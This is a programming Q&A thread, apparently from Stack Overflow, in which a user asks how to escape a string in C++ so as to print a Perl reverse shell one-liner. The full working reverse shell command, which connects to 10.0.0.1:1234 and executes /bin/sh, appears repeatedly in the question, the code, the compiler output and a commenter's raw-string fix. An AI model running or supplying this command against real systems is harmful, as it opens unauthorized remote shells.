How can I put a reverse shell one liner in a string and print it to the terminal?

Question

I'm trying to print a reverse shell one liner to the terminal using C++ (not running the command, just printing it) -

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

This is the one liner, I've tried to put it in std::string but I quickly realized it doesn't like that at all. I also tried to just pipe it to cout directly, I'm not sure how to deal with the "bad chars", what is the best way to go about doing this? I want to print it with cout somehow.

#include <iostream>
#include <string>

int main() {
    std::string perl {"perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'"};
    std::cout << perl;

    std::cout << "perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'" << std::endl;  
}

test.cpp:5:45: error: too many decimal points in number
    5 |  std::string perl {"perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'"};
      |                                             ^~~~~~~~
test.cpp:8:40: error: too many decimal points in number
    8 |  std::cout << "perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'" << std::endl;
      |                                        ^~~~~~~~
test.cpp: In function ‘int main()’:
test.cpp:5:45: error: expected ‘}’ before numeric constant
    5 |  std::string perl {"perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'"};
      |                   ~                         ^~~~~~~~
test.cpp:5:45: error: expected ‘,’ or ‘;’ before numeric constant
test.cpp: At global scope:
test.cpp:6:7: error: ‘cout’ in namespace ‘std’ does not name a type
    6 |  std::cout << perl;
      |       ^~~~
In file included from test.cpp:1:
/usr/include/c++/10/iostream:61:18: note: ‘std::cout’ declared here
   61 |   extern ostream cout;  /// Linked to standard output
      |                  ^~~~
test.cpp:8:7: error: ‘cout’ in namespace ‘std’ does not name a type
    8 |  std::cout << "perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'" << std::endl;
      |       ^~~~
In file included from test.cpp:1:
/usr/include/c++/10/iostream:61:18: note: ‘std::cout’ declared here
   61 |   extern ostream cout;  /// Linked to standard output
      |                  ^~~~
test.cpp:9:1: error: expected declaration before ‘}’ token
    9 | }
      |

Why the lonely C tag? It's assumable that you are programming in all those C++ versions. BTW, C and C++ are distinct languages. For example, C++ has `std::string` for text and C doesn't. You should remove the C language tag. — Thomas Matthews, Oct 15 '21 at 23:44
Please show us what have tou tried (your code that failed) and why it didn't work (compiler error? please copy and paste it). And please choose only one standard version that you are using, not all of them. — Yksisarvinen, Oct 15 '21 at 23:45
I added the C tag because if someone knows how to do it in C I might be able to just figure out a way to do it in C++ from a C example lol, I'll remove it. — apt1337, Oct 15 '21 at 23:46
Literally printing it to the console should work just fine if you use `std::cout`. Could you show the attempt and how exactly it failed? — cigien, Oct 15 '21 at 23:47
As @ThomasMatthews mentioned, use only tags that are actually applicable to your post. Using inappropriate tags is called *tag spamming*, and is a very quick way to get your question downvoted and/or closed here. Tags have meaning and relevance, because they're used in searches and in getting questions to the attention of people who follow those tags. Nothing is more irritating than answering a question, only to find out that the poster can't use it because it's not actually applicable to the language they're using. Don't waste the time of people being kind enough to donate it to help you. — Ken White, Oct 15 '21 at 23:49
`std::string a = R"EOF(perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};')EOF";` might be of use to you. — KamilCuk, Oct 15 '21 at 23:49
Psst: https://perldoc.perl.org/IO::Socket::INET is your friend. `perl -MIO::Socket::INET -e 'my $s = IO::Socket::INET->new(PeerAddr => "10.0.0.1", PeerPort => 1234, Proto => "tcp"); ...'` — Shawn, Oct 15 '21 at 23:50
Thankyou @KamilCuk that solved the problem, and thankyou for everyone else that commented, I'm sorry about the tags it's my first post :) — apt1337, Oct 16 '21 at 00:06

How can I put a reverse shell one liner in a string and print it to the terminal?

0 Answers0